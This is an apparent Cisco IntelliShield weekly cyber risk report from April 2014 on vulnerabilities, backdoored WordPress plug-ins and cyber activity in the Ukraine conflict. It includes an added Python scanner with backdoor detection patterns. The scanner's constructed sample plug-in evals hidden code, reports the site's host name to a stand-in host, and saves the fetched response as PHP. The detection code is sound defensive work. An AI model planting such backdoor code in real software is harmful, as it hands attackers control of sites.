Cyber Risk Report: March 31-April 6, 2014

 
Threat Type: IntelliShield: Cyber Risk Report
IntelliShield ID: 33677
Version: 1
First Published: 2014 April 07 19:03 GMT
Last Published: 2014 April 07 19:03 GMT
Port: Not available
Urgency: Weakness Found
Credibility: Confirmed
Severity: Mild Damage

Version Summary: This is the Cyber Risk Report for March 31-April 6, 2014. The report details the significant events for this time period and covers multiple threat and risk management categories.

Description
 

Contents

Vulnerability
Attacks and Compromises
Geopolitical
Upcoming Security Activity
Additional Information


Vulnerability

Vulnerability activity for the period declined from previous periods, although the monthly total for March 2014 shows a continued increase in vulnerability activity. Highlights for this period include a large update for Apple Safari, Adobe Reader and Flash Player vulnerabilities, and a new vulnerability in UNIX CUPS.

The vulnerability metrics for the first quarter of 2014 show the consistent increase not only in total vulnerabilities, but also in new vulnerabilities. Researchers, governments, and vendors are increasingly competing and paying for the identification of new vulnerabilities, further fueling the increasing activity levels. The growing movement of incorporating secure development lifecycle practices in developing and maintaining software has also contributed to the identification and correction of more vulnerabilities. These two factors are contributing to the increasing levels of vulnerability activity and increasing the load on system operators and owners to keep their systems updated. The industry has responded with an increasing number of automated scanning, monitoring and updating products to assist owners and operators, particularly those who operate the increasingly common virtual environments. Organizations that operate large environments should strongly consider investing in one of these products to assist and automate their system maintenance and management.

Apple released a large update for the Safari browser to correct 16 vulnerabilities. Researchers reported multiple vulnerabilities in Adobe Reader and Flash Player; Adobe has not confirmed these vulnerabilities and has not released updated software. The Common UNIX Printing System (CUPS) contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. This vulnerability has also not been confirmed by the developers, and software updates are not available. Additional vulnerabilities and software updates were reported for JBoss, OpenStack, Wireshark, and RSA Adaptive Authentication.

Cisco released the following Security Notices, available at Cisco Security Advisories, Responses, and Notices:
  • Cisco Unity Connection Directory Traversal Vulnerability
  • Cisco IOS XR Software ICMPv6 Redirect Vulnerability
  • Cisco Emergency Responder Dynamic Content Modification Vulnerability
  • Cisco IOS Software IKE Main Mode Vulnerability
  • Cisco Emergency Responder Cross-Site Scripting Vulnerability
  • Cisco Emergency Responder Cross-Site Request Forgery Vulnerability
  • Cisco Emergency Responder Open Redirect Vulnerability
  • Cisco WSA HTTP Header Injection Vulnerability
  • Cisco Security Manager HTTP Header Redirection Vulnerability
  • Cisco Unity Connection Cross-Site Scripting Vulnerability 

Microsoft announced that its April 2014 release will contain four security bulletins, including fixes for Internet Explorer vulnerabilities and the last regular security updates for Windows XP. With the end of support and security updates for Windows XP, the U.S. Department of Homeland Security (DHS) warned that criminals and scammers are likely to target remaining XP users with increased email spam and fake technical-support cold calls in order to gain access to and control of these systems.

In ICS/SCADA activity, Schneider Electric reported vulnerabilities in its SCADA drivers. Researchers continue to increase their focus on these SCADA system vulnerabilities and are more actively developing exploits for these vulnerabilities.

IntelliShield published 141 events last week: 86 new events and 55 updated events. Of the 141 events, 44 were Vulnerability Alerts, 13 were Security Activity Bulletins, two were Security Issue Alerts, 81 were Threat Outbreak Alerts, and one was a Cyber Risk Report. The alert publication totals are as follows:

Day        Date         New   Updated   Total
Saturday   04/05/2014     1         2       3
Friday     04/04/2014    13        14      27
Thursday   04/03/2014    15         6      21
Wednesday  04/02/2014    16        11      27
Tuesday    04/01/2014    17        13      30
Monday     03/31/2014    24         9      33

Month       New   Updated   Total
January     349       188     537
February    442       180     622
March       447       251     698
Totals     1238       619    1857
 

Previous Alerts That Still Represent Significant Risk

Microsoft Office Word RTF File Processing Remote Code Execution Vulnerability
IntelliShield Vulnerability Alert 33490, Version 1, March 24, 2014
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2014-1761
Microsoft Office Word contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Microsoft reports that limited attacks that use this vulnerability have occurred in the wild. Microsoft has released a security advisory; however, software updates are not available.

Microsoft Internet Explorer Memory Corruption Vulnerability
IntelliShield Vulnerability Alert 33126, Version 3, April 7, 2014
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2014-0307
Microsoft Internet Explorer contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code. Functional code that exploits this vulnerability is available as part of the Metasploit framework. Microsoft has confirmed the vulnerability in a security bulletin and released software updates.

Microsoft Internet Explorer Use-After-Free Vulnerability 
IntelliShield Vulnerability Alert 32870, Version 3, March 11, 2014
Urgency/Credibility/Severity Rating: 3/5/4
CVE-2014-0322
Microsoft Internet Explorer contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. Exploits observed in the wild target Internet Explorer 10 with Adobe Flash. Reports also indicate that installing Microsoft's Enhanced Mitigation Experience Toolkit (EMET) or updating to Internet Explorer 11 prevents the exploit. Microsoft has confirmed the vulnerability in a security bulletin and released software updates.

Apple iOS Updates for March 2014
IntelliShield Activity Bulletin 33265, Version 1, March 11, 2014
Urgency/Credibility/Severity Rating: 2/5/4
Multiple CVEs
Apple iOS contains multiple vulnerabilities that could allow unauthenticated, remote or local attackers to conduct multiple attacks. Apple iOS versions prior to 7.1 for iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later devices are vulnerable. Updates are available.

Apple OS X Mavericks Security Updates for February 2014
IntelliShield Security Activity Bulletin 33051, Version 1, February 25, 2014
Urgency/Credibility/Severity Rating: 2/5/4
CVE-2014-1245, CVE-2014-1246, CVE-2014-1247, CVE-2014-1248, CVE-2014-1249, CVE-2014-1250, CVE-2014-1254, CVE-2014-1255, CVE-2014-1256, CVE-2014-1257, CVE-2014-1258, CVE-2014-1259, CVE-2014-1260, CVE-2014-1261, CVE-2014-1262, CVE-2014-1263, CVE-2014-1265
Apple has released a security and feature update to correct multiple vulnerabilities in Apple Mac OS X 10.9.1, and security updates for Mountain Lion 10.8.5 and Lion 10.7.5. 

Attacks and Compromises

WordPress Plug-ins Used in Distributed Denial of Service Attacks

Researchers identified multiple plug-ins, particularly premium plug-ins, that are being used to compromise WordPress systems and enlist them in distributed denial of service (DDoS) attacks. The researchers highlighted that while the risk of free plug-ins is well known, multiple premium plug-ins that users must pay for have also been compromised and used to infect systems. The infected systems notify the attackers, who then download additional malicious code to the systems. Malicious sites have also been identified that offer these premium plug-ins at lower cost, tempting system owners to download the backdoored copies.
Hijacking WordPress Websites with Free Premium Plugins
Unmasking "Free" Premium WordPress Plugins

Analysis: WordPress systems continue to be targeted through known vulnerabilities on systems that have not been maintained and through a multitude of plug-in vulnerabilities that give attackers access to and control of the system. This trend was identified last year as attackers shifted from end-user systems to compromising web servers for their greater processing power and bandwidth. This latest research shows a new attack method using premium plug-ins, which are often more trusted. System owners may place more trust in these plug-ins because they are paying for them, even if they obtain the premium plug-in at a reduced price from a site other than the vendor's. As the attacks and compromises on WordPress systems continue, hosting and service providers may need to become involved to regain control of infected systems that have been abandoned or are not being actively maintained.
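The pattern described above (a paid plug-in that carries hidden code, phones home, and pulls down more code) leaves traces a site owner can triage from the filesystem. The following Python script is an added example, not code from this report or from the researchers cited: it walks a plug-in tree and flags PHP files that show generic obfuscation and callback indicators, and it ships with two constructed sample plug-ins so it runs offline. The indicator patterns, the plug-in names, and the `example.invalid` host are assumptions for illustration, not signatures from the campaign described here.

```python
import os
import re
import tempfile
from dataclasses import dataclass

# Generic indicators of a backdoored plug-in (assumed heuristics for this
# example, not signatures of the campaign described in the report).
INDICATORS = [
    ("eval_of_decoded",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("dynamic_eval",
     re.compile(r"\b(assert|create_function)\s*\(\s*\$", re.I)),
    ("remote_fetch",
     re.compile(r"(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I)),
    ("php_file_write",
     re.compile(r"file_put_contents\s*\(.{0,120}?\.php['\"]", re.I)),
    ("long_base64_blob",
     re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]


@dataclass
class Finding:
    path: str        # path relative to the plug-in root, forward slashes
    indicator: str
    line_no: int
    snippet: str


def scan_file(path: str, rel: str) -> list:
    """Return one Finding per (line, indicator) hit in a PHP file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line_no, line in enumerate(fh, start=1):
            for name, pattern in INDICATORS:
                if pattern.search(line):
                    findings.append(Finding(rel, name, line_no, line.strip()[:80]))
    return findings


def scan_tree(root: str) -> dict:
    """Map every .php file under root (by relative path) to its findings.
    Clean files map to an empty list so they are visibly accounted for."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            results[rel] = scan_file(full, rel)
    return results


def classify(findings: list) -> str:
    """Two or more distinct indicator types in one file: suspicious.
    One: review by hand. None: clean (by these heuristics only)."""
    kinds = {f.indicator for f in findings}
    if len(kinds) >= 2:
        return "suspicious"
    return "review" if kinds else "clean"


# Constructed sample of an ordinary plug-in with nothing to flag.
CLEAN_PLUGIN = """<?php
/* Plugin Name: Clean Example (constructed sample) */
add_action('wp_footer', 'clean_example_footer');
function clean_example_footer() {
    echo '<!-- clean example -->';
}
"""

# Constructed sample of a "nulled" premium plug-in: decodes and evals a
# hidden blob, phones home, and writes whatever comes back as a new PHP file.
NULLED_PLUGIN = """<?php
/* Plugin Name: Premium SEO Booster (constructed sample, assumed name) */
add_action('init', 'pseo_boot');
function pseo_boot() {
    $k = "ZWNobyAnaGknOw==";  // base64 of: echo 'hi';
    eval(base64_decode($k));
    $r = @file_get_contents("http://example.invalid/check.php?h=" . $_SERVER['HTTP_HOST']);
    if ($r) { file_put_contents(dirname(__FILE__) . "/cache.php", $r); }
}
"""


def build_sample_plugins() -> str:
    """Write the two constructed sample plug-ins into a temp dir; return its root."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    for sub, body in (("clean-example", CLEAN_PLUGIN), ("premium-seo", NULLED_PLUGIN)):
        os.makedirs(os.path.join(root, sub), exist_ok=True)
        with open(os.path.join(root, sub, "init.php"), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    results = scan_tree(build_sample_plugins())
    for rel, findings in sorted(results.items()):
        print(f"{classify(findings):10s} {rel}")
        for f in findings:
            print(f"    line {f.line_no} {f.indicator}: {f.snippet}")
```

Point `scan_tree` at a real `wp-content/plugins` directory to use it beyond the samples. The heuristics are deliberately loose: a single hit (for example a legitimate updater that fetches over HTTP) only earns "review", and a file is called "suspicious" only when two different indicator types co-occur, which is the combination a backdoored plug-in tends to exhibit. A clean verdict here means nothing more than that none of these patterns matched, so treat it as triage, not as proof of integrity.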

Geopolitical

Evolution of Cyber in Military Action

As the world watches Russian troops massing along Ukraine's eastern border, reports are surfacing about communications disruptions, website defacements, and sophisticated malware accompanying the military action. According to NATO Commander General Philip Breedlove, when Russian troops annexed Crimea in March, they cut telephone cables and jammed communications, cutting off the Ukrainian troops in Crimea from their command and control. During the protests in Kiev, some protesters received ominous text messages that read, "Dear Subscriber, You are registered as a participant in a mass disturbance." Further, the sophisticated information-stealing malware known as Ouroboros, or Snake, which has plagued Ukrainian government systems for years, has been increasingly active in recent weeks.
A Cyber History of the Ukraine Conflict 
Why Ukraine Hasn't Sparked a Big Cyberwar 
NATO Commander Sees Potent Threat from Russia
Suspicion Falls on Russia for Snake Cyberattacks 

Analysis: Information security specialists are closely watching the cyber component of the current situation in Ukraine and measuring it against other recent regional conflicts in which network outages, website defacements, or other cyber activity occurred in tandem with military conflict (Georgia in 2008) or a political incident (Estonia in 2007). Unlike the Russian military invasion of Georgia's South Ossetia region in 2008, for example, the annexation of Crimea was not accompanied by a complete Internet blackout, and most outages were confined to the Crimea area. Media reporting also indicates that the Crimea outages may have been caused by physical disruption (cutting of cables when service provider Ukrtelecom's offices were entered) rather than by electronic means. However, if Western media reporting is accurate, no other regional conflict has combined as many different kinds of cyber attack, from website defacements to malware and outages, within a period of a few weeks. While no single attack has done decisive damage and no actor or group of actors can be positively identified, taken together these attacks have been an effective complement to the military action.

Upcoming Security Activity

Infosec World: April 5-11, 2014
GovSec (U.S.): May 13-14, 2014
Cisco Live 2014: May 18-22, 2014
FIRST Conference: June 22-27, 2014
Black Hat USA: August 2-7, 2014
DEF CON 22: August 7-10, 2014
(ISC)2 Security Congress/ASIS 2014: September 29- October 2, 2014

Because of the potential for increased risk on multiple vectors, organizations' security teams should be aware of and consider making special preparations for the following:

U.S. NCAA Men's Basketball Tournament: March 16-April 7, 2014
ITU 6th World Telecom Development Conference: March 31-April 11, 2014
2014 FIFA World Cup Brazil: June 12-July 13, 2014
India National Elections: April 7-May 12, 2014

Additional Information

For information and commentary from the experts in Cisco Security, please visit the Cisco Security Blog.

For timely information from across Cisco Security, please consider following @CiscoSecurity on Twitter.

 
Alert History
 
Initial Release


Product Sets
 
The security vulnerability applies to the following combinations of products.

Primary Products:
IntelliShield Cyber Risk Report Original Release Base

Associated Products:
N/A



LEGAL DISCLAIMER
The urgency and severity ratings of this alert are not tailored to individual users; users may value alerts differently based upon their network configurations and circumstances. THE ALERT, AND INFORMATION CONTAINED THEREIN, ARE PROVIDED ON AN "AS IS" BASIS AND DO NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE ALERT, AND INFORMATION CONTAINED THEREIN, OR MATERIALS LINKED FROM THE ALERT, IS AT YOUR OWN RISK. INFORMATION IN THIS ALERT AND ANY RELATED COMMUNICATIONS IS BASED ON OUR KNOWLEDGE AT THE TIME OF PUBLICATION AND IS SUBJECT TO CHANGE WITHOUT NOTICE. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME.
Powered by IntelliShield